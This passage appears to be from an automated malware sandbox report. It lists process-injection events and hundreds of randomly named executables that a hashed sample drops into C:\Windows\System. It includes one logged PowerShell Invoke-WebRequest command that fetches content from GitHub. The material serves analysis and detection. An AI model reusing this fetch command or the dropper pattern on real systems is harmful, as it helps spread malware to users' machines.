PID 2968 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\NCbSbWH.exe
PID 2968 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\NCbSbWH.exe
PID 2968 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\mdDwtNI.exe
PID 2968 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\mdDwtNI.exe
PID 2968 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\mdDwtNI.exe
PID 2968 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\VDsHovw.exe
PID 2968 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\VDsHovw.exe
PID 2968 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\VDsHovw.exe
PID 2968 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\QNkapwI.exe
PID 2968 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\QNkapwI.exe
PID 2968 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\QNkapwI.exe
PID 2968 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\BaLrkTI.exe
PID 2968 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\BaLrkTI.exe
PID 2968 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\BaLrkTI.exe
PID 2968 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\lKcbNQa.exe
PID 2968 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\lKcbNQa.exe
PID 2968 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\lKcbNQa.exe
PID 2968 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\gXrcmas.exe
PID 2968 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\gXrcmas.exe
PID 2968 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\gXrcmas.exe
PID 2968 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\plHvLvc.exe
PID 2968 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\plHvLvc.exe
PID 2968 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\plHvLvc.exe
PID 2968 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\FJDJVkc.exe
PID 2968 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\FJDJVkc.exe
PID 2968 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\FJDJVkc.exe
PID 2968 wrote to memory of 1628 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\VbfeQnY.exe
PID 2968 wrote to memory of 1628 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\VbfeQnY.exe
PID 2968 wrote to memory of 1628 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\VbfeQnY.exe
PID 2968 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\wbrEZEN.exe
PID 2968 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\wbrEZEN.exe
PID 2968 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\wbrEZEN.exe
PID 2968 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\PqIkVEO.exe
PID 2968 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\PqIkVEO.exe
PID 2968 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\PqIkVEO.exe
PID 2968 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\jMzNhmV.exe
PID 2968 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\jMzNhmV.exe
PID 2968 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\jMzNhmV.exe
PID 2968 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\qlyRWQx.exe
PID 2968 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\qlyRWQx.exe
PID 2968 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\qlyRWQx.exe
PID 2968 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\tJgrxBW.exe
PID 2968 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\tJgrxBW.exe
PID 2968 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\tJgrxBW.exe
PID 2968 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\OixsoQP.exe
PID 2968 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\OixsoQP.exe
PID 2968 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\OixsoQP.exe
PID 2968 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\MRZBMyW.exe
PID 2968 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\MRZBMyW.exe
PID 2968 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\MRZBMyW.exe
PID 2968 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\Ctkzsqx.exe
PID 2968 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\Ctkzsqx.exe
PID 2968 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\Ctkzsqx.exe
PID 2968 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\ddPkPXd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\tyAOfJU.exe

C:\Windows\System\tyAOfJU.exe

C:\Windows\System\kcNmKkM.exe

C:\Windows\System\kcNmKkM.exe

C:\Windows\System\NCbSbWH.exe

C:\Windows\System\NCbSbWH.exe

C:\Windows\System\mdDwtNI.exe

C:\Windows\System\mdDwtNI.exe

C:\Windows\System\VDsHovw.exe

C:\Windows\System\VDsHovw.exe

C:\Windows\System\QNkapwI.exe

C:\Windows\System\QNkapwI.exe

C:\Windows\System\BaLrkTI.exe

C:\Windows\System\BaLrkTI.exe

C:\Windows\System\lKcbNQa.exe

C:\Windows\System\lKcbNQa.exe

C:\Windows\System\gXrcmas.exe

C:\Windows\System\gXrcmas.exe

C:\Windows\System\plHvLvc.exe

C:\Windows\System\plHvLvc.exe

C:\Windows\System\FJDJVkc.exe

C:\Windows\System\FJDJVkc.exe

C:\Windows\System\VbfeQnY.exe

C:\Windows\System\VbfeQnY.exe

C:\Windows\System\wbrEZEN.exe

C:\Windows\System\wbrEZEN.exe

C:\Windows\System\PqIkVEO.exe

C:\Windows\System\PqIkVEO.exe

C:\Windows\System\jMzNhmV.exe

C:\Windows\System\jMzNhmV.exe

C:\Windows\System\qlyRWQx.exe

C:\Windows\System\qlyRWQx.exe

C:\Windows\System\tJgrxBW.exe

C:\Windows\System\tJgrxBW.exe

C:\Windows\System\OixsoQP.exe

C:\Windows\System\OixsoQP.exe

C:\Windows\System\MRZBMyW.exe

C:\Windows\System\MRZBMyW.exe

C:\Windows\System\Ctkzsqx.exe

C:\Windows\System\Ctkzsqx.exe

C:\Windows\System\ddPkPXd.exe

C:\Windows\System\ddPkPXd.exe

C:\Windows\System\isbRxtN.exe

C:\Windows\System\isbRxtN.exe

C:\Windows\System\AWKPgNc.exe

C:\Windows\System\AWKPgNc.exe

C:\Windows\System\WwMUtII.exe

C:\Windows\System\WwMUtII.exe

C:\Windows\System\BonoMfd.exe

C:\Windows\System\BonoMfd.exe

C:\Windows\System\OkjMtAr.exe

C:\Windows\System\OkjMtAr.exe

C:\Windows\System\nkRAjCm.exe

C:\Windows\System\nkRAjCm.exe

C:\Windows\System\rSvNZgZ.exe

C:\Windows\System\rSvNZgZ.exe

C:\Windows\System\JdFxsvL.exe

C:\Windows\System\JdFxsvL.exe

C:\Windows\System\gwgVavP.exe

C:\Windows\System\gwgVavP.exe

C:\Windows\System\LjQLVpW.exe

C:\Windows\System\LjQLVpW.exe

C:\Windows\System\iHelium.exe

C:\Windows\System\iHelium.exe

C:\Windows\System\MXTqVsc.exe

C:\Windows\System\MXTqVsc.exe

C:\Windows\System\ewaUDtm.exe

C:\Windows\System\ewaUDtm.exe

C:\Windows\System\tAXNxnT.exe

C:\Windows\System\tAXNxnT.exe

C:\Windows\System\gUoCAPe.exe

C:\Windows\System\gUoCAPe.exe

C:\Windows\System\wnRKIeL.exe

C:\Windows\System\wnRKIeL.exe

C:\Windows\System\mtEsqxp.exe

C:\Windows\System\mtEsqxp.exe

C:\Windows\System\JSRSNml.exe

C:\Windows\System\JSRSNml.exe

C:\Windows\System\ObEoxgx.exe

C:\Windows\System\ObEoxgx.exe

C:\Windows\System\hhpqwIl.exe

C:\Windows\System\hhpqwIl.exe

C:\Windows\System\iLaOXBB.exe

C:\Windows\System\iLaOXBB.exe

C:\Windows\System\JlzFnHt.exe

C:\Windows\System\JlzFnHt.exe

C:\Windows\System\MDBuise.exe

C:\Windows\System\MDBuise.exe

C:\Windows\System\iFNWlxa.exe

C:\Windows\System\iFNWlxa.exe

C:\Windows\System\ABVNGeT.exe

C:\Windows\System\ABVNGeT.exe

C:\Windows\System\TKJWcoW.exe

C:\Windows\System\TKJWcoW.exe

C:\Windows\System\HbDrSUS.exe

C:\Windows\System\HbDrSUS.exe

C:\Windows\System\drFOHVR.exe

C:\Windows\System\drFOHVR.exe

C:\Windows\System\gDafpof.exe

C:\Windows\System\gDafpof.exe

C:\Windows\System\JwiGzrk.exe

C:\Windows\System\JwiGzrk.exe

C:\Windows\System\FtkmACP.exe

C:\Windows\System\FtkmACP.exe

C:\Windows\System\thlLNOg.exe

C:\Windows\System\thlLNOg.exe

C:\Windows\System\IQtPRSW.exe

C:\Windows\System\IQtPRSW.exe

C:\Windows\System\nLPvUlu.exe

C:\Windows\System\nLPvUlu.exe

C:\Windows\System\vmkWkUp.exe

C:\Windows\System\vmkWkUp.exe

C:\Windows\System\iFEpCwn.exe

C:\Windows\System\iFEpCwn.exe

C:\Windows\System\PiiTZMW.exe

C:\Windows\System\PiiTZMW.exe

C:\Windows\System\bTCLVed.exe

C:\Windows\System\bTCLVed.exe

C:\Windows\System\CBDIQgX.exe

C:\Windows\System\CBDIQgX.exe

C:\Windows\System\zPapknG.exe

C:\Windows\System\zPapknG.exe

C:\Windows\System\jtsXami.exe

C:\Windows\System\jtsXami.exe

C:\Windows\System\SqsfTYG.exe

C:\Windows\System\SqsfTYG.exe

C:\Windows\System\hwMEQBm.exe

C:\Windows\System\hwMEQBm.exe

C:\Windows\System\cPmSduv.exe

C:\Windows\System\cPmSduv.exe

C:\Windows\System\puHJJpY.exe

C:\Windows\System\puHJJpY.exe

C:\Windows\System\eSoUIPc.exe

C:\Windows\System\eSoUIPc.exe

C:\Windows\System\mtBewLc.exe

C:\Windows\System\mtBewLc.exe

C:\Windows\System\WIljUlj.exe

C:\Windows\System\WIljUlj.exe

C:\Windows\System\EfEgXfD.exe

C:\Windows\System\EfEgXfD.exe

C:\Windows\System\yfRaCyE.exe

C:\Windows\System\yfRaCyE.exe

C:\Windows\System\JQinIzT.exe

C:\Windows\System\JQinIzT.exe

C:\Windows\System\bChDAkE.exe

C:\Windows\System\bChDAkE.exe

C:\Windows\System\hcClpgX.exe

C:\Windows\System\hcClpgX.exe

C:\Windows\System\AODLgMq.exe

C:\Windows\System\AODLgMq.exe

C:\Windows\System\awZOgND.exe

C:\Windows\System\awZOgND.exe

C:\Windows\System\NMuPuRQ.exe

C:\Windows\System\NMuPuRQ.exe

C:\Windows\System\aArMyCx.exe

C:\Windows\System\aArMyCx.exe

C:\Windows\System\FZWxRrg.exe

C:\Windows\System\FZWxRrg.exe

C:\Windows\System\eWZOUcx.exe

C:\Windows\System\eWZOUcx.exe

C:\Windows\System\KOzdhsO.exe

C:\Windows\System\KOzdhsO.exe

C:\Windows\System\IrYTtht.exe

C:\Windows\System\IrYTtht.exe

C:\Windows\System\dyBtaie.exe

C:\Windows\System\dyBtaie.exe

C:\Windows\System\mulRvto.exe

C:\Windows\System\mulRvto.exe

C:\Windows\System\rMAcVyp.exe

C:\Windows\System\rMAcVyp.exe

C:\Windows\System\kFsRwSx.exe

C:\Windows\System\kFsRwSx.exe

C:\Windows\System\QgSdVTu.exe

C:\Windows\System\QgSdVTu.exe

C:\Windows\System\IlAQSUm.exe

C:\Windows\System\IlAQSUm.exe

C:\Windows\System\XAzaNND.exe

C:\Windows\System\XAzaNND.exe

C:\Windows\System\xfEcual.exe

C:\Windows\System\xfEcual.exe

C:\Windows\System\FhrzJYm.exe

C:\Windows\System\FhrzJYm.exe

C:\Windows\System\ioDZtWa.exe

C:\Windows\System\ioDZtWa.exe

C:\Windows\System\wRBdXZU.exe

C:\Windows\System\wRBdXZU.exe

C:\Windows\System\CrEdeJZ.exe

C:\Windows\System\CrEdeJZ.exe

C:\Windows\System\KsLlypz.exe

C:\Windows\System\KsLlypz.exe

C:\Windows\System\nZaKSjO.exe

C:\Windows\System\nZaKSjO.exe

C:\Windows\System\ZSFkKgP.exe

C:\Windows\System\ZSFkKgP.exe

C:\Windows\System\ECAlQRP.exe

C:\Windows\System\ECAlQRP.exe

C:\Windows\System\sLUyBjB.exe

C:\Windows\System\sLUyBjB.exe

C:\Windows\System\lZtDFQu.exe

C:\Windows\System\lZtDFQu.exe

C:\Windows\System\diUnVGW.exe

C:\Windows\System\diUnVGW.exe

C:\Windows\System\bIYdByw.exe

C:\Windows\System\bIYdByw.exe

C:\Windows\System\FTMpXFT.exe

C:\Windows\System\FTMpXFT.exe

C:\Windows\System\UALLCbj.exe

C:\Windows\System\UALLCbj.exe

C:\Windows\System\nbNpWLM.exe

C:\Windows\System\nbNpWLM.exe

C:\Windows\System\KHrRyfn.exe

C:\Windows\System\KHrRyfn.exe

C:\Windows\System\bzpXycv.exe

C:\Windows\System\bzpXycv.exe

C:\Windows\System\ksFzCbH.exe

C:\Windows\System\ksFzCbH.exe

C:\Windows\System\RAospBb.exe

C:\Windows\System\RAospBb.exe

C:\Windows\System\aXxmvct.exe

C:\Windows\System\aXxmvct.exe

C:\Windows\System\yFIjdEJ.exe

C:\Windows\System\yFIjdEJ.exe

C:\Windows\System\TURppmh.exe

C:\Windows\System\TURppmh.exe

C:\Windows\System\fBPHaHh.exe

C:\Windows\System\fBPHaHh.exe

C:\Windows\System\cqFhkty.exe

C:\Windows\System\cqFhkty.exe

C:\Windows\System\kbOykWK.exe

C:\Windows\System\kbOykWK.exe

C:\Windows\System\dQnrljz.exe

C:\Windows\System\dQnrljz.exe

C:\Windows\System\fFNZAqL.exe

C:\Windows\System\fFNZAqL.exe

C:\Windows\System\XrNyPRO.exe

C:\Windows\System\XrNyPRO.exe

C:\Windows\System\dRwpsjK.exe

C:\Windows\System\dRwpsjK.exe

C:\Windows\System\vFMptkJ.exe

C:\Windows\System\vFMptkJ.exe

C:\Windows\System\rVVzXir.exe

C:\Windows\System\rVVzXir.exe

C:\Windows\System\qdiIUUo.exe

C:\Windows\System\qdiIUUo.exe

C:\Windows\System\wgyPYml.exe

C:\Windows\System\wgyPYml.exe

C:\Windows\System\EHMbjiG.exe

C:\Windows\System\EHMbjiG.exe

C:\Windows\System\sBPDGcB.exe

C:\Windows\System\sBPDGcB.exe

C:\Windows\System\oPOeVom.exe

C:\Windows\System\oPOeVom.exe

C:\Windows\System\DJjvumz.exe

C:\Windows\System\DJjvumz.exe

C:\Windows\System\JTCicXi.exe

C:\Windows\System\JTCicXi.exe

C:\Windows\System\mYEWbYX.exe

C:\Windows\System\mYEWbYX.exe

C:\Windows\System\JulBRFT.exe

C:\Windows\System\JulBRFT.exe

C:\Windows\System\nQZAPnv.exe

C:\Windows\System\nQZAPnv.exe

C:\Windows\System\ocFcTKY.exe

C:\Windows\System\ocFcTKY.exe

C:\Windows\System\bzDmDTl.exe

C:\Windows\System\bzDmDTl.exe

C:\Windows\System\HUbTFaa.exe

C:\Windows\System\HUbTFaa.exe

C:\Windows\System\ogGZopB.exe

C:\Windows\System\ogGZopB.exe

C:\Windows\System\tsmFAVi.exe

C:\Windows\System\tsmFAVi.exe

C:\Windows\System\MIZKenx.exe

C:\Windows\System\MIZKenx.exe

C:\Windows\System\BdmyJUh.exe

C:\Windows\System\BdmyJUh.exe

C:\Windows\System\uEPykfj.exe

C:\Windows\System\uEPykfj.exe

C:\Windows\System\dJGLsUO.exe

C:\Windows\System\dJGLsUO.exe

C:\Windows\System\GiKdZRq.exe

C:\Windows\System\GiKdZRq.exe

C:\Windows\System\LWQRmFN.exe

C:\Windows\System\LWQRmFN.exe

C:\Windows\System\piLZBlY.exe

C:\Windows\System\piLZBlY.exe

C:\Windows\System\FMxxIoT.exe

C:\Windows\System\FMxxIoT.exe

C:\Windows\System\ZKtrVVq.exe

C:\Windows\System\ZKtrVVq.exe

C:\Windows\System\OlsALyZ.exe

C:\Windows\System\OlsALyZ.exe

C:\Windows\System\KMeYFkB.exe

C:\Windows\System\KMeYFkB.exe

C:\Windows\System\froDWUT.exe

C:\Windows\System\froDWUT.exe

C:\Windows\System\ZASeJnI.exe

C:\Windows\System\ZASeJnI.exe

C:\Windows\System\gSESwzJ.exe

C:\Windows\System\gSESwzJ.exe

C:\Windows\System\JqEPGZc.exe

C:\Windows\System\JqEPGZc.exe

C:\Windows\System\mycCpzT.exe

C:\Windows\System\mycCpzT.exe

C:\Windows\System\CbtXhHa.exe

C:\Windows\System\CbtXhHa.exe

C:\Windows\System\TLquywu.exe

C:\Windows\System\TLquywu.exe

C:\Windows\System\GiWgFdN.exe

C:\Windows\System\GiWgFdN.exe

C:\Windows\System\vhGMcNk.exe

C:\Windows\System\vhGMcNk.exe

C:\Windows\System\LZqfZSY.exe

C:\Windows\System\LZqfZSY.exe

C:\Windows\System\hxisNfe.exe

C:\Windows\System\hxisNfe.exe

C:\Windows\System\YISqcBT.exe

C:\Windows\System\YISqcBT.exe

C:\Windows\System\HgCFDWl.exe

C:\Windows\System\HgCFDWl.exe

C:\Windows\System\PoqqJBH.exe

C:\Windows\System\PoqqJBH.exe

C:\Windows\System\aofJzAv.exe

C:\Windows\System\aofJzAv.exe

C:\Windows\System\TnSNLWW.exe

C:\Windows\System\TnSNLWW.exe

C:\Windows\System\DKdHehK.exe

C:\Windows\System\DKdHehK.exe

C:\Windows\System\JtoTIBM.exe

C:\Windows\System\JtoTIBM.exe

C:\Windows\System\CvWmdYE.exe

C:\Windows\System\CvWmdYE.exe

C:\Windows\System\bneQZVZ.exe

C:\Windows\System\bneQZVZ.exe

C:\Windows\System\KuDcKIc.exe

C:\Windows\System\KuDcKIc.exe

C:\Windows\System\nRSQoWf.exe

C:\Windows\System\nRSQoWf.exe

C:\Windows\System\lBVTnBd.exe

C:\Windows\System\lBVTnBd.exe

C:\Windows\System\RRQjrdi.exe

C:\Windows\System\RRQjrdi.exe

C:\Windows\System\FbnHGyg.exe

C:\Windows\System\FbnHGyg.exe

C:\Windows\System\ARcxqtW.exe

C:\Windows\System\ARcxqtW.exe

C:\Windows\System\KofWLYm.exe

C:\Windows\System\KofWLYm.exe

C:\Windows\System\jTNVPZV.exe

C:\Windows\System\jTNVPZV.exe

C:\Windows\System\yWTKKDz.exe

C:\Windows\System\yWTKKDz.exe

C:\Windows\System\iXxzPiO.exe

C:\Windows\System\iXxzPiO.exe

C:\Windows\System\rvVtdFH.exe

C:\Windows\System\rvVtdFH.exe

C:\Windows\System\jsbrecC.exe

C:\Windows\System\jsbrecC.exe

C:\Windows\System\PPezuhj.exe

C:\Windows\System\PPezuhj.exe

C:\Windows\System\MlZsxth.exe

C:\Windows\System\MlZsxth.exe

C:\Windows\System\LJEdYtC.exe

C:\Windows\System\LJEdYtC.exe

C:\Windows\System\BewvFGb.exe

C:\Windows\System\BewvFGb.exe

C:\Windows\System\zRVLaaD.exe

C:\Windows\System\zRVLaaD.exe

C:\Windows\System\drMpYZI.exe

C:\Windows\System\drMpYZI.exe

C:\Windows\System\tZSXkXI.exe

C:\Windows\System\tZSXkXI.exe

C:\Windows\System\ZKLFZsT.exe

C:\Windows\System\ZKLFZsT.exe

C:\Windows\System\cLUXyxK.exe

C:\Windows\System\cLUXyxK.exe

C:\Windows\System\ZUIsaVS.exe

C:\Windows\System\ZUIsaVS.exe

C:\Windows\System\KVWGIDW.exe

C:\Windows\System\KVWGIDW.exe

C:\Windows\System\FXQvuVQ.exe

C:\Windows\System\FXQvuVQ.exe

C:\Windows\System\tOluvkQ.exe

C:\Windows\System\tOluvkQ.exe

C:\Windows\System\VXUzpIX.exe

C:\Windows\System\VXUzpIX.exe

C:\Windows\System\wvYMabE.exe

C:\Windows\System\wvYMabE.exe

C:\Windows\System\QbnSsRZ.exe

C:\Windows\System\QbnSsRZ.exe

C:\Windows\System\HyAjuaJ.exe

C:\Windows\System\HyAjuaJ.exe

C:\Windows\System\DrtHXji.exe

C:\Windows\System\DrtHXji.exe

C:\Windows\System\qENyiXO.exe

C:\Windows\System\qENyiXO.exe

C:\Windows\System\AwxUBhW.exe

C:\Windows\System\AwxUBhW.exe

C:\Windows\System\loKYSiw.exe

C:\Windows\System\loKYSiw.exe

C:\Windows\System\XlQxPAO.exe

C:\Windows\System\XlQxPAO.exe

C:\Windows\System\wXeAvrq.exe

C:\Windows\System\wXeAvrq.exe

C:\Windows\System\MPwPGyS.exe

C:\Windows\System\MPwPGyS.exe

C:\Windows\System\tYGHcpS.exe

C:\Windows\System\tYGHcpS.exe

C:\Windows\System\axuclkL.exe

C:\Windows\System\axuclkL.exe

C:\Windows\System\lLPupmB.exe

C:\Windows\System\lLPupmB.exe

C:\Windows\System\LRIFAUk.exe

C:\Windows\System\LRIFAUk.exe

C:\Windows\System\MfOPCzM.exe

C:\Windows\System\MfOPCzM.exe

C:\Windows\System\yNaqZeE.exe

C:\Windows\System\yNaqZeE.exe

C:\Windows\System\zcczjNI.exe

C:\Windows\System\zcczjNI.exe

C:\Windows\System\rPfYSyK.exe

C:\Windows\System\rPfYSyK.exe

C:\Windows\System\NPGqUIQ.exe

C:\Windows\System\NPGqUIQ.exe

C:\Windows\System\aZtqbHh.exe

C:\Windows\System\aZtqbHh.exe

C:\Windows\System\liSLXaS.exe

C:\Windows\System\liSLXaS.exe

C:\Windows\System\jKddeRM.exe

C:\Windows\System\jKddeRM.exe

C:\Windows\System\MddDllj.exe

C:\Windows\System\MddDllj.exe

C:\Windows\System\nFSCuHy.exe

C:\Windows\System\nFSCuHy.exe

C:\Windows\System\GMJvLlp.exe

C:\Windows\System\GMJvLlp.exe

C:\Windows\System\SMRzqJH.exe

C:\Windows\System\SMRzqJH.exe

C:\Windows\System\qlDcqMK.exe

C:\Windows\System\qlDcqMK.exe

C:\Windows\System\hTsfTya.exe

C:\Windows\System\hTsfTya.exe

C:\Windows\System\ejQkbfV.exe

C:\Windows\System\ejQkbfV.exe

C:\Windows\System\vwSgtrl.exe

C:\Windows\System\vwSgtrl.exe

C:\Windows\System\vpzpKRf.exe

C:\Windows\System\vpzpKRf.exe

C:\Windows\System\LFxEhHj.exe

C:\Windows\System\LFxEhHj.exe

C:\Windows\System\nrOLHKZ.exe

C:\Windows\System\nrOLHKZ.exe

C:\Windows\System\VAdmiMR.exe

C:\Windows\System\VAdmiMR.exe

C:\Windows\System\bFLvCQo.exe

C:\Windows\System\bFLvCQo.exe

C:\Windows\System\NmFtNkD.exe

C:\Windows\System\NmFtNkD.exe

C:\Windows\System\PYrrXrk.exe

C:\Windows\System\PYrrXrk.exe

C:\Windows\System\GiyLeKJ.exe

C:\Windows\System\GiyLeKJ.exe

C:\Windows\System\XdnPOhz.exe

C:\Windows\System\XdnPOhz.exe

C:\Windows\System\MOLLRbC.exe

C:\Windows\System\MOLLRbC.exe

C:\Windows\System\wLcjFZV.exe

C:\Windows\System\wLcjFZV.exe

C:\Windows\System\WZXuGVN.exe

C:\Windows\System\WZXuGVN.exe

C:\Windows\System\UKQsWwT.exe

C:\Windows\System\UKQsWwT.exe

C:\Windows\System\GfdXhkQ.exe

C:\Windows\System\GfdXhkQ.exe

C:\Windows\System\TAorCRZ.exe

C:\Windows\System\TAorCRZ.exe

C:\Windows\System\NIkXkzm.exe

C:\Windows\System\NIkXkzm.exe

C:\Windows\System\AeuoQvD.exe

C:\Windows\System\AeuoQvD.exe

C:\Windows\System\zgJfVWv.exe

C:\Windows\System\zgJfVWv.exe

C:\Windows\System\atRrgID.exe

C:\Windows\System\atRrgID.exe

C:\Windows\System\FCJDCVh.exe

C:\Windows\System\FCJDCVh.exe

C:\Windows\System\OAfXikv.exe

